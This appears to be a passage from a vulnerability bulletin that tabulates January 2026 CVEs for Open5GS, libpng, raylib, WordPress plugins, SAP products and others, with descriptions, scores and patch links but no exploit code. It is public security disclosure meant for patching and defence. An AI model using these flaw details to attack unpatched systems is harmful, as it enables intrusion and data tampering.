| n/a--Open5GS | A vulnerability was identified in Open5GS up to 2.7.5. This vulnerability affects the function sgwc_bearer_add of the file src/sgwc/context.c. The manipulation leads to reachable assertion. The attack can be carried out remotely. The exploit is publicly available and might be used. The issue report is flagged as already-fixed. | 2026-01-17 | 5.3 | CVE-2025-15531 | VDB-341598 \| Open5GS context.c sgwc_bearer_add assertion VDB-341598 \| CTI Indicators (IOB, IOC, IOA) Submit #729339 \| Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4233 https://github.com/open5gs/open5gs/issues/4233#issue-3776216182 |
| n/a--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.5. This issue affects some unknown processing of the component Timer Handler. The manipulation results in resource consumption. The attack may be performed remotely. The exploit has been released to the public and may be used for attacks. The patch is identified as c7c131f8d2cb1195ada5e0e691b6868ebcd8a845. It is best practice to apply a patch to resolve this issue. | 2026-01-17 | 5.3 | CVE-2025-15532 | VDB-341599 \| Open5GS Timer resource consumption VDB-341599 \| CTI Indicators (IOB, IOC, TTP) Submit #729354 \| Open5GS SGWC v2.7.6 Denial of Service Submit #729357 \| Open5GS SGWC v2.7.6 Denial of Service (Duplicate) https://github.com/open5gs/open5gs/issues/4220 https://github.com/open5gs/open5gs/issues/4221 https://github.com/open5gs/open5gs/issues/4220#issue-3766066853 https://github.com/open5gs/open5gs/commit/c7c131f8d2cb1195ada5e0e691b6868ebcd8a845 |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.6. Impacted is the function sgwc_s11_handle_downlink_data_notification_ack of the file src/sgwc/s11-handler.c of the component sgwc. This manipulation causes denial of service. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. Patch name: b4707272c1caf6a7d4dca905694ea55557a0545f. To fix this issue, it is recommended to deploy a patch. The issue report is flagged as already-fixed. | 2026-01-18 | 5.3 | CVE-2025-15539 | VDB-341732 \| Open5GS sgwc s11-handler.c sgwc_s11_handle_downlink_data_notification_ack denial of service VDB-341732 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #735339 \| Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4230 https://github.com/open5gs/open5gs/issues/4230#issue-3774173079 https://github.com/open5gs/open5gs/commit/b4707272c1caf6a7d4dca905694ea55557a0545f |
| n8n-io--n8n | n8n is an open source workflow automation platform. From 1.36.0 to before 2.2.0, the Webhook node's IP whitelist validation performed partial string matching instead of exact IP comparison. As a result, an incoming request could be accepted if the source IP address merely contained the configured whitelist entry as a substring. This issue affected instances where workflow editors relied on IP-based access controls to restrict webhook access. Both IPv4 and IPv6 addresses were impacted. An attacker with a non-whitelisted IP could bypass restrictions if their IP shared a partial prefix with a trusted address, undermining the intended security boundary. This vulnerability is fixed in 2.2.0. | 2026-01-13 | 5.3 | CVE-2025-68949 | https://github.com/n8n-io/n8n/security/advisories/GHSA-w96v-gf22-crwp https://github.com/n8n-io/n8n/issues/23399 https://github.com/n8n-io/n8n/pull/23399 https://github.com/n8n-io/n8n/commit/11f8597d4ad69ea3b58941573997fdbc4de1fec5 |
| naa986--Payment Button for PayPal | The Payment Button for PayPal plugin for WordPress is vulnerable to unauthorized order creation in all versions up to, and including, 1.2.3.41. This is due to the plugin exposing a public AJAX endpoint (`wppaypalcheckout_ajax_process_order`) that processes checkout results without any authentication or server-side verification of the PayPal transaction. This makes it possible for unauthenticated attackers to create arbitrary orders on the site with any chosen transaction ID, payment status, product name, amount, or customer information via direct POST requests to the AJAX endpoint, granted they can bypass basic parameter validation. If email sending is enabled, the plugin will also trigger purchase receipt emails to any email address supplied in the request, leading to order database corruption and unauthorized outgoing emails without any real PayPal transaction taking place. | 2026-01-17 | 5.3 | CVE-2025-14463 | https://www.wordfence.com/threat-intel/vulnerabilities/id/814e50de-3690-4adf-bc01-a63cd71bd1cf?source=cve https://plugins.trac.wordpress.org/browser/wp-paypal/trunk/wp-paypal.php#L70 https://plugins.trac.wordpress.org/browser/wp-paypal/tags/1.2.3.41/wp-paypal.php#L70 https://plugins.trac.wordpress.org/browser/wp-paypal/trunk/wp-paypal-checkout.php#L249 https://plugins.trac.wordpress.org/browser/wp-paypal/tags/1.2.3.41/wp-paypal-checkout.php#L249 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3431974%40wp-paypal&new=3431974%40wp-paypal&sfp_email=&sfph_mail= |
| netcashpaynow--Netcash WooCommerce Payment Gateway | The Netcash WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_return_url function in all versions up to, and including, 4.1.3. This makes it possible for unauthenticated attackers to mark any WooCommerce order as processing/completed. | 2026-01-14 | 5.3 | CVE-2025-14880 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ca11df6-83e3-48b5-84b8-3f3e4f75ac4a?source=cve https://plugins.trac.wordpress.org/browser/netcash-pay-now-payment-gateway-for-woocommerce/tags/4.1.3/includes/class-wc-gateway-paynow.php#L1127 |
| ninjateam--WP Duplicate Page | The WP Duplicate Page plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'duplicateBulkHandle' and 'duplicateBulkHandleHPOS' functions in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate arbitrary posts, pages, and WooCommerce HPOS orders even when their role is explicitly excluded from the plugin's "Allowed User Roles" setting, potentially exposing sensitive information and allowing duplicate fulfillment of WooCommerce orders. | 2026-01-13 | 5.4 | CVE-2025-14001 | https://www.wordfence.com/threat-intel/vulnerabilities/id/60830ed8-3ab8-44e8-899c-7032a187da8b?source=cve https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.8/includes/Classes/ButtonDuplicate.php#L54 https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.8/includes/Classes/ButtonDuplicate.php#L79 https://plugins.trac.wordpress.org/changeset/3432233/ |
| nofearinc--WP-CRM System Manage Clients and Projects | The WP-CRM System plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on the wpcrm_get_email_recipients and wpcrm_system_ajax_task_change_status AJAX functions in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with subscriber level access and above, to enumerate CRM contact email addresses (PII disclosure) and modify CRM task statuses. | 2026-01-14 | 5.4 | CVE-2025-14854 | https://www.wordfence.com/threat-intel/vulnerabilities/id/da607df4-1dbb-4b1e-ace6-b339cf9e8512?source=cve https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.5/includes/wcs-functions.php?marks=942-975#L942 https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.5/includes/wcs-dashboard-task-list.php?marks=177-190#L177 |
| NSecsoft--NSecKrnl | NSecsoft 'NSecKrnl' is a Windows driver that allows a local, authenticated attacker to terminate processes owned by other users, including SYSTEM and Protected Processes by issuing crafted IOCTL requests to the driver. | 2026-01-13 | 4.7 | CVE-2025-68947 | |
| obridgeacademy--WPBlogSyn | The WPBlogSyn plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the plugin's remote sync settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-14 | 4.3 | CVE-2025-14389 | https://www.wordfence.com/threat-intel/vulnerabilities/id/141137a4-609f-4ea9-beba-d37b48144c29?source=cve https://plugins.trac.wordpress.org/browser/wpblogsync/tags/1.0/blogsync.php#L14 |
| Open Asset Import Library--Assimp | A security vulnerability has been detected in Open Asset Import Library Assimp up to 6.0.2. Affected by this vulnerability is the function Assimp::LWOImporter::FindUVChannels of the file /src/assimp/code/AssetLib/LWO/LWOMaterial.cpp. Such manipulation leads to use after free. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. This and similar defects are tracked and handled via issue #6128. | 2026-01-18 | 5.3 | CVE-2025-15538 | VDB-341727 | Open Asset Import Library Assimp LWOMaterial.cpp FindUVChannels use after free VDB-341727 | CTI Indicators (IOB, IOC, IOA) Submit #735232 | Open Asset Import Library Assimp 6.0.2 Use After Free https://github.com/assimp/assimp/issues/6258 https://github.com/assimp/assimp/issues/6258#issuecomment-3070999530 https://github.com/user-attachments/files/21216542/assimp_poc10.zip |
| opencryptoki--opencryptoki | openCryptoki is a PKCS#11 library and tools for Linux and AIX. In 3.25.0 and 3.26.0, the CKM_ECDH_AES_KEY_WRAP implementation contains a heap buffer overflow that allows an attacker with local access to cause out-of-bounds writes in the host process by supplying a compressed EC public key and invoking C_WrapKey. This can lead to heap corruption or denial of service. | 2026-01-13 | 6.6 | CVE-2026-22791 | https://github.com/opencryptoki/opencryptoki/security/advisories/GHSA-26f5-3mwq-4wm7 https://github.com/opencryptoki/opencryptoki/commit/785d7577e1477d12fbe235554e7e7b24f2de34b7 https://github.com/opencryptoki/opencryptoki/commit/e37e9127deeeb7bf3c3c4d852c594256c57ec3a8 |
| OpenSC project--pam_pkcs11 | In OpenSC pam_pkcs11 before 0.6.13, pam_sm_authenticate() wrongly returns PAM_IGNORE in many error situations (such as an error triggered by a smartcard before login), allowing authentication bypass. | 2026-01-16 | 6.7 | CVE-2025-24531 | https://github.com/OpenSC/pam_pkcs11/security/advisories/GHSA-7mf6-rg36-qgch https://github.com/OpenSC/pam_pkcs11/releases https://www.openwall.com/lists/oss-security/2025/02/06/3 |
| opensourcepos--opensourcepos | Open Source Point of Sale (opensourcepos) is a web based point of sale application written in PHP using the CodeIgniter framework. opensourcepos 3.4.0 and 3.4.1 have a stored XSS vulnerability in the Configuration (Information) functionality. An authenticated user with the permission "Configuration: Change OSPOS's Configuration" can inject a malicious JavaScript payload into the Company Name field when updating Information in Configuration. The payload is stored and later triggered when a user accesses /sales/complete (select Sales, choose New Item to create an item, then click Completed). Due to insufficient input validation and output encoding, the payload is rendered and executed in the user's browser, resulting in a stored XSS vulnerability. This vulnerability is fixed in 3.4.2. | 2026-01-13 | 4.3 | CVE-2025-68658 | https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-32r8-8r9r-9chw https://github.com/opensourcepos/opensourcepos/commit/849439c71eaa4c15857fb7c603297261c2ddc26d |
| paultgoodchild--Shield: Blocks Bots, Protects Users, and Prevents Security Breaches | The Shield: Blocks Bots, Protects Users, and Prevents Security Breaches plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 21.0.9 via the MfaGoogleAuthToggle class due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disable Google Authenticator for any user. | 2026-01-16 | 4.3 | CVE-2025-15370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d777014a-5397-4062-af39-7ea86589a0d0?source=cve https://plugins.trac.wordpress.org/browser/wp-simple-firewall/tags/21.0.8/src/lib/src/ActionRouter/Actions/MfaGoogleAuthToggle.php https://plugins.trac.wordpress.org/changeset/3438647/wp-simple-firewall |
| payhere--PayHere Payment Gateway Plugin for WooCommerce | The PayHere Payment Gateway Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to improper validation logic in the check_payhere_response function in all versions up to, and including, 2.3.9. This makes it possible for unauthenticated attackers to change the status of pending WooCommerce orders to paid/completed/on hold. | 2026-01-14 | 5.3 | CVE-2025-15475 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e0c92241-0bef-4f87-8478-4d805435f09d?source=cve https://plugins.trac.wordpress.org/browser/payhere-payment-gateway/tags/2.3.9/gateway/class-wcgatewaypayhere.php#L709 |
| perfitdev--Perfit WooCommerce | The Perfit WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0.1. This is due to missing authorization checks on the `logout` function called via the `actions` function hooked to `admin_init`. This makes it possible for unauthenticated attackers to delete arbitrary plugin settings via the `action` parameter. | 2026-01-14 | 5.3 | CVE-2025-14173 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cb141b46-2585-4b58-8d91-0cdb275348a1?source=cve https://plugins.trac.wordpress.org/browser/perfit-woocommerce/trunk/includes/class-wcp-settings-tab.php#L102 https://plugins.trac.wordpress.org/browser/perfit-woocommerce/tags/1.0.1/includes/class-wcp-settings-tab.php#L102 |
| Phpwcms--Phpwcms | Phpwcms 1.9.30 contains a file upload vulnerability that allows authenticated attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG payloads through the multiple file upload feature to potentially execute cross-site scripting attacks on the platform. | 2026-01-15 | 5.4 | CVE-2021-47783 | ExploitDB-50363 Official Product Homepage VulnCheck Advisory: Phpwcms 1.9.30 - Arbitrary File Upload |
| pimcore--pimcore | Pimcore Web2Print Tools Bundle adds tools for web-to-print use cases to Pimcore. Prior to 5.2.2 and 6.1.1, the application fails to enforce proper server-side authorization checks on the API endpoint responsible for managing "Favourite Output Channel Configurations." Testing revealed that an authenticated backend user lacking explicit permissions for this feature was still able to successfully invoke the endpoint and modify or retrieve these configurations. This vulnerability is fixed in 5.2.2 and 6.1.1. | 2026-01-15 | 5.4 | CVE-2026-23496 | https://github.com/pimcore/pimcore/security/advisories/GHSA-4wg4-p27p-5q2r https://github.com/pimcore/web2print-tools/pull/108 https://github.com/pimcore/web2print-tools/commit/7714452a04b9f9b077752784af4b8d0b05e464a1 https://github.com/pimcore/web2print-tools/releases/tag/v5.2.2 https://github.com/pimcore/web2print-tools/releases/tag/v6.1.1 |
| pimcore--pimcore | Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the application fails to enforce proper server-side authorization checks on the API endpoint responsible for reading or listing static routes. In Pimcore, static routes are custom URL patterns defined via the backend interface or the var/config/staticroutes.php file, including details like regex-based patterns, controllers, variables, and priorities. These routes are registered automatically through the PimcoreStaticRoutesBundle and integrated into the MVC routing system. Testing revealed that an authenticated backend user lacking explicit permissions was able to invoke the endpoint (e.g., GET /api/static-routes) and retrieve sensitive route configurations. This vulnerability is fixed in 12.3.1 and 11.5.14. | 2026-01-15 | 4.3 | CVE-2026-23494 | https://github.com/pimcore/pimcore/security/advisories/GHSA-m3r2-724c-pwgf https://github.com/pimcore/pimcore/pull/18893 https://github.com/pimcore/pimcore/releases/tag/v11.5.14 https://github.com/pimcore/pimcore/releases/tag/v12.3.1 |
| pimcore--pimcore | Pimcore's Admin Classic Bundle provides a Backend UI for Pimcore. Prior to 2.2.3 and 1.7.16, the API endpoint for listing Predefined Properties in the Pimcore platform lacks adequate server-side authorization checks. Predefined Properties are configurable metadata definitions (e.g., name, key, type, default value) used across documents, assets, and objects to standardize custom attributes and improve editorial workflows, as documented in Pimcore's official properties guide. Testing confirmed that an authenticated backend user without explicit permissions for property management could successfully call the endpoint and retrieve the complete list of these configurations. The vulnerability is fixed in 2.2.3 and 1.7.16. | 2026-01-15 | 4.3 | CVE-2026-23495 | https://github.com/pimcore/pimcore/security/advisories/GHSA-hqrp-m84v-2m2f https://github.com/pimcore/admin-ui-classic-bundle/commit/98095949fbeaf11cdf4cadb2989d7454e1b88909 https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.7.16 https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v2.2.3 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54. | 2026-01-12 | 6.1 | CVE-2026-22695 | https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp https://github.com/pnggroup/libpng/issues/778 https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea https://github.com/pnggroup/libpng/commit/e4f7ad4ea2 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.26 to 1.6.53, an integer truncation in the libpng simplified write API functions png_write_image_16bit and png_write_image_8bit causes a heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54. | 2026-01-12 | 6.8 | CVE-2026-22801 | https://github.com/pnggroup/libpng/security/advisories/GHSA-vgjq-8cw5-ggw8 |
| prasannasp--Short Link | The Short Link plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'short_link_post_title' and 'short_link_page_title' parameters in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected page. | 2026-01-14 | 4.4 | CVE-2026-0813 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8623d2cc-dcdd-4453-9a86-669bdd44eae1?source=cve https://plugins.trac.wordpress.org/browser/short-link/tags/1.0/short-link.php#L118 https://plugins.trac.wordpress.org/browser/short-link/trunk/short-link.php#L118 |
| radykal--Fancy Product Designer | The Fancy Product Designer plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 6.4.8. This is due to improper error handling in the PDF upload functionality that exposes server filesystem paths and stack traces in error messages. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. | 2026-01-16 | 5.3 | CVE-2025-15526 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9b39b4ce-3885-4ea4-8cf0-84e66e7f6a12?source=cve https://support.fancyproductdesigner.com/support/discussions/topics/13000036024 |
| raysan5--raylib | A vulnerability was determined in raysan5 raylib up to 909f040. Affected by this vulnerability is the function GenImageFontAtlas of the file src/rtext.c. Executing a manipulation can lead to heap-based buffer overflow. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. This patch is called 5a3391fdce046bc5473e52afbd835dd2dc127146. Applying a patch is advised to resolve this issue. | 2026-01-18 | 5.3 | CVE-2025-15533 | VDB-341705 | raysan5 raylib rtext.c GenImageFontAtlas heap-based overflow VDB-341705 | CTI Indicators (IOB, IOC, IOA) Submit #733341 | raysan5 raylib 909f040 Heap-based Buffer Overflow Submit #733342 | raysan5 raylib 909f040 Heap-based Buffer Overflow (Duplicate) https://github.com/raysan5/raylib/issues/5433 https://github.com/raysan5/raylib/pull/5450 https://github.com/oneafter/1224/blob/main/hbf2 https://github.com/raysan5/raylib/commit/5a3391fdce046bc5473e52afbd835dd2dc127146 |
| raysan5--raylib | A vulnerability was identified in raysan5 raylib up to 909f040. Affected by this issue is the function LoadFontData of the file src/rtext.c. The manipulation leads to integer overflow. The attack can only be performed from a local environment. The exploit is publicly available and might be used. The identifier of the patch is 5a3391fdce046bc5473e52afbd835dd2dc127146. It is suggested to install a patch to address this issue. | 2026-01-18 | 5.3 | CVE-2025-15534 | VDB-341706 | raysan5 raylib rtext.c LoadFontData integer overflow VDB-341706 | CTI Indicators (IOB, IOC, IOA) Submit #733343 | raysan5 raylib 909f040 Integer Overflow https://github.com/raysan5/raylib/issues/5436 https://github.com/raysan5/raylib/pull/5450 https://github.com/oneafter/1224/blob/main/segv1 https://github.com/raysan5/raylib/commit/5a3391fdce046bc5473e52afbd835dd2dc127146 |
| rebelcode--RSS Aggregator RSS Import, News Feeds, Feed to Post, and Autoblogging | The RSS Aggregator - RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'className' parameter in all versions up to, and including, 5.0.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-16 | 6.1 | CVE-2025-14375 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3d2dde13-2940-478e-8e2b-baf60003754a?source=cve https://plugins.trac.wordpress.org/changeset/3439384/wp-rss-aggregator |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in vsftpd. This vulnerability allows a denial of service (DoS) via an integer overflow in the ls command parameter parsing, triggered by a remote, authenticated attacker sending a crafted STAT command with a specific byte sequence. | 2026-01-14 | 6.5 | CVE-2025-14242 | RHSA-2026:0605 RHSA-2026:0606 RHSA-2026:0608 https://access.redhat.com/security/cve/CVE-2025-14242 RHBZ#2419826 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libxml2, an XML parsing library. This uncontrolled recursion vulnerability occurs in the xmlCatalogXMLResolveURI function when an XML catalog contains a delegate URI entry that references itself. A remote attacker could exploit this configuration-dependent issue by providing a specially crafted XML catalog, leading to infinite recursion and call stack exhaustion. This ultimately results in a segmentation fault, causing a Denial of Service (DoS) by crashing affected applications. | 2026-01-15 | 5.9 | CVE-2026-0990 | https://access.redhat.com/security/cve/CVE-2026-0990 RHBZ#2429959 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libsoup's WebSocket frame processing when handling incoming messages. If a non-default configuration is used where the maximum incoming payload size is unset, the library may read memory outside the intended bounds. This can cause unintended memory exposure or a crash. Applications using libsoup's WebSocket support with this configuration may be impacted. | 2026-01-13 | 4.8 | CVE-2026-0716 | https://access.redhat.com/security/cve/CVE-2026-0716 RHBZ#2427896 https://gitlab.gnome.org/GNOME/libsoup/-/issues/476 |
| rndsand81--Stopwords for comments | The Stopwords for comments plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the 'set_stopwords_for_comments' and 'delete_stopwords_for_comments' functions. This makes it possible for unauthenticated attackers to add or delete stopwords via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-14 | 4.3 | CVE-2025-15376 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dd8c45c7-dbb2-46ab-8e50-e02062587b00?source=cve https://plugins.trac.wordpress.org/browser/stopwords-for-comments/trunk/functions.php?marks=151,170#L151 |
| roxnor--GetGenie AI Content Writer with Keyword Research & SEO Tracking Tools | The GetGenie plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.3.0. This is due to the plugin not properly verifying that a user is authorized to delete a specific post. This makes it possible for authenticated attackers, with Author-level access and above, to delete any post on the WordPress site, including posts authored by other users. | 2026-01-16 | 4.3 | CVE-2026-1003 | https://www.wordfence.com/threat-intel/vulnerabilities/id/38ec647a-3c0c-4d3c-ba34-64c17803867b?source=cve https://plugins.trac.wordpress.org/browser/getgenie/trunk/app/Api/GetGenieChat.php#L153 https://plugins.trac.wordpress.org/changeset/3436920/ |
| saadiqbal--Quick Contact Form | The Quick Contact Form plugin for WordPress is vulnerable to Open Mail Relay in all versions up to, and including, 8.2.6. This is due to the 'qcf_validate_form' AJAX endpoint allowing a user controlled parameter to set the 'from' email address. This makes it possible for unauthenticated attackers to send emails to arbitrary recipients utilizing the server. The email content is limited to the contact form submission details. | 2026-01-17 | 5.8 | CVE-2025-12718 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dc7ba538-a7ee-48c8-996c-b8db1934fdeb?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433286%40quick-contact-form&new=3433286%40quick-contact-form&sfp_email=&sfph_mail= |
| sablab--Internal Link Builder | The Internal Link Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2025-14725 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1febe071-b296-4958-a9e8-9be9391f2390?source=cve https://plugins.trac.wordpress.org/browser/internal-link-builder/trunk/InternalLinkBuilder.php#L133 |
| Sanluan--PublicCMS | A vulnerability was found in Sanluan PublicCMS up to 5.202506.d. Affected is the function delete of the file publiccms-trade/src/main/java/com/publiccms/controller/web/trade/TradeAddressController.java of the component Trade Address Deletion Endpoint. Performing a manipulation of the argument ids results in improper authorization. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.4 | CVE-2026-1112 | VDB-341704 | Sanluan PublicCMS Trade Address Deletion Endpoint TradeAddressController.java delete improper authorization VDB-341704 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #732771 | publiccms PublicCMS <= V5.202506.d Insecure Direct Object Reference (IDOR) https://github.com/AnalogyC0de/public_exp/issues/4 |
| Sanluan--PublicCMS | A vulnerability has been found in Sanluan PublicCMS up to 5.202506.d. This impacts the function Save of the file com/publiccms/controller/admin/sys/TaskTemplateAdminController.java of the component Task Template Management Handler. Such manipulation of the argument path leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 4.7 | CVE-2026-1111 | VDB-341703 | Sanluan PublicCMS Task Template Management TaskTemplateAdminController.java save path traversal VDB-341703 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #732726 | publiccms PublicCMS <= V5.202506.d Remote Code Execution (RCE) https://github.com/AnalogyC0de/public_exp/issues/2 |
| SAP_SE--Business Server Pages Application (Product Designer Web UI) | SAP Product Designer Web UI of Business Server Pages allows authenticated non-administrative users to access non-sensitive information. This results in a low impact on confidentiality, with no impact on integrity or availability of the application. | 2026-01-13 | 4.3 | CVE-2026-0497 | https://me.sap.com/notes/3677111 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Business Connector | Due to a Cross-Site Scripting (XSS) vulnerability in SAP Business Connector, an unauthenticated attacker could craft a malicious link. When an unsuspecting user clicks this link, the user may be redirected to a site controlled by the attacker. Successful exploitation could allow the attacker to access or modify information related to the webclient, impacting confidentiality and integrity, with no effect on availability. | 2026-01-13 | 6.1 | CVE-2026-0514 | https://me.sap.com/notes/3666061 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP ERP Central Component and SAP S/4HANA (SAP EHS Management) | Due to a missing authorization check in SAP ERP Central Component (SAP ECC) and SAP S/4HANA (SAP EHS Management), an attacker could extract hardcoded clear-text credentials and bypass the password authentication check by manipulating user parameters. Upon successful exploitation, the attacker can access, modify or delete certain change pointer information within EHS objects in the application, which might further affect subsequent systems. This vulnerability leads to a low impact on confidentiality and integrity of the application, with no effect on availability. | 2026-01-13 | 6.4 | CVE-2026-0503 | https://me.sap.com/notes/3681523 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to upload any file (including script files) without proper file format validation. This has low impact on confidentiality, integrity and availability of the application. | 2026-01-13 | 6.6 | CVE-2026-0496 | https://me.sap.com/notes/3565506 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to send uploaded files to arbitrary emails which could enable effective phishing campaigns. This has low impact on confidentiality, integrity and availability of the application. | 2026-01-13 | 5.1 | CVE-2026-0495 | https://me.sap.com/notes/3565506 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | Due to a Cross-Site Request Forgery (CSRF) vulnerability in SAP Fiori App Intercompany Balance Reconciliation, an attacker could execute state-changing actions using an inappropriate request type. This deviation from expected request semantics may allow an attacker to trigger unintended actions on behalf of an authenticated user, causing low impact on integrity of the system. This has no impact on confidentiality and availability. | 2026-01-13 | 4.3 | CVE-2026-0493 | https://me.sap.com/notes/3655229 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | Under certain conditions SAP Fiori App Intercompany Balance Reconciliation application allows an attacker to access information which would otherwise be restricted. This has low impact on confidentiality of the application, integrity and availability are not impacted. | 2026-01-13 | 4.3 | CVE-2026-0494 | https://me.sap.com/notes/3655227 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP NetWeaver Enterprise Portal | SAP NetWeaver Enterprise Portal allows an unauthenticated attacker to inject malicious scripts into a URL parameter. The scripts are reflected in the server response and executed in a user's browser when the crafted URL is visited, leading to theft of session information, manipulation of portal content, or user redirection, resulting in a low impact on the application's confidentiality and integrity, with no impact on availability. | 2026-01-13 | 6.1 | CVE-2026-0499 | https://me.sap.com/notes/3687372 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Supplier Relationship Management (SICF Handler in SRM Catalog) | Due to an Open Redirect Vulnerability in SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, redirects them to an attacker-controlled site. This causes low impact on integrity of the application. Confidentiality and availability are not impacted. | 2026-01-13 | 4.7 | CVE-2026-0513 | https://me.sap.com/notes/3638716 https://url.sap/sapsecuritypatchday |
| SchedMD--Slurm | In SchedMD Slurm before 24.11.5, 24.05.8, and 23.11.11, the accounting system can allow a Coordinator to promote a user to Administrator. | 2026-01-16 | 4.2 | CVE-2025-43904 | https://www.schedmd.com/security-policy/ https://lists.schedmd.com/mailman3/hyperkitty/list/slurm-announce@lists.schedmd.com/message/B73QHKW6TKE2T5KDWVPIWNE5H4KWX667/ |
| Schlix--Schlix CMS | Schlix CMS 2.2.6-6 contains a persistent cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into category titles. Attackers can create a new contact category with a script payload that will execute when the page is viewed by other users. | 2026-01-16 | 6.4 | CVE-2021-47834 | ExploitDB-49837 Vendor Homepage VulnCheck Advisory: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) |
